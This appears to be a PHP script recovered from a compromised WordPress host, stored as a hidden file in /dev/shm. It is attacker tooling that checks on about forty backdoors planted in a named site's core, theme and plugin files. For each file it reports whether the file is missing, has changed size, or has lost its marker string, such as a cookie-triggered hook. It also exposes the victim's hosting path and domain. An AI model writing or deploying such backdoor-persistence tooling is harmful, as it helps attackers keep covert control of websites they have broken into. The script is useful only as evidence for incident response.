Current File : //proc/self/root/dev/shm/.data_chunk
<?php   $r = '/home/spargrew/jwdesign.sparxtechsolutions.com'; $x = ["/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/admin-views/fields/add_new_case.php"=>"bd@@22166@@1527",
"/wp-includes/blocks/post-navigation-link.php"=>"bd@@74467@@restore_state",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/Divi/V31ge/includes/modules/SmartSlider3FullWidth/BigMath.php"=>"bd@@69034@@1580",
"/wp-content/plugins/contact-form-7/includes/capabilities.php"=>"bd@@22091@@reverse_searcher",
"/wp-content/themes/twentytwentyfive/patterns/template-home-text-blog.php"=>"bd@@41330@@21",
"/wp-content/plugins/kadence-starter-templates/dist/starter-templates.asset.php"=>"bd@@41340@@$_COOKIE[5",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Auth/Token/Token.php"=>"bd@@41341@@574",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Resources/Filters/Plugin.FilterIterator.php"=>"bd@@41342@@1741",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Utils/infos.php"=>"bd@@41345@@703",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/monolog/monolog/src/Monolog/Attribute/user_actions.php"=>"bd@@22159@@1672",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Forms/FloatingMenu/fax.php"=>"bd@@69036@@535",
"/wp-content/plugins/wpvivid-backuprestore/vendor/google/apiclient-services/src/Google/Service/Drive/_fedex.php"=>"bd@@69038@@1846",
"/wp-includes/SimplePie/library/SimplePie/Copyright.php"=>"bd@@73401@@8",
"/wp-content/plugins/loginizer/init.php"=>"bd@@73402@@33",
"/wp-includes/customize/class-wp-customize-upload-control.php"=>"bd@@73403@@70",
"/wp-content/themes/twentytwentythree/patterns/footer-default.php"=>"bd@@73404@@30",
"/wp-includes/widgets/class-wp-widget-media.php"=>"bd@@73405@@75",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/symfony/http-client/Exception/board.bak.php"=>"bd@@73406@@2602",
"/wp-includes/customize/class-wp-customize-nav-menu-name-control.php"=>"bd@@61130@@82",
"/wp-content/plugins/wpvivid-backuprestore/vendor/google/apiclient-services/src/Google/Service/Drive/Resource/Changes.php"=>"bd@@61131@@58",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slide/AddLayer/tcp.class.php"=>"bd@@61134@@1590",
"/index.php"=>"bd@@73174@@61",
"/wp-includes/customize/class-wp-sidebar-block-editor-control.php"=>"bd@@74466@@35",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/Elementor/Textarea.php"=>"bd@@74468@@2056",
"/wp-content/plugins/loginizer/index.php"=>"bd@@73173@@buffer_cache",
"/wp-content/themes/twentytwentyfive/patterns/cta-events-list.php"=>"bd@@74464@@75",
"/wp-content/plugins/wpvivid-backuprestore/vendor/guzzle/guzzle/src/Guzzle/Plugin/Cookie/CookieJar/registration.php"=>"bd@@41343@@593",
"/wp-content/themes/twentytwentyfour/patterns/page-about-business.php"=>"bd@@74465@@approve_request",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/Banner/recipe_topicsnav.php"=>"bd@@69035@@537",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/AdminIframe/StringHash.php"=>"bd@@41344@@608",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/vlucas/phpdotenv/src/Store/verification.php"=>"bd@@22168@@1967",
"/wp-includes/interactivity-api/class-wp-interactivity-api.php"=>"bd@@69024@@70",
"/wp-content/plugins/elementor/assets/js/packages/editor-documents/editor-documents.asset.php"=>"bd@@74463@@6",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/Header/tuto4.php"=>"bd@@22150@@1538",
"/wp-content/plugins/wpvivid-backuprestore/index.php"=>"bd@@69031@@53",
"/wp-content/themes/twentytwentyfour/patterns/page-home-blogging.php"=>"bd@@69032@@21",
"/wp-includes/blocks/post-author.php"=>"bd@@69033@@72",
"/wp-content/themes/kadence/inc/customizer/google-font-variants.php"=>"bd@@61128@@67",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Platform/WordPress/Integration/BeaverBuilder/includes/frontend.php"=>"bd@@61132@@18"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');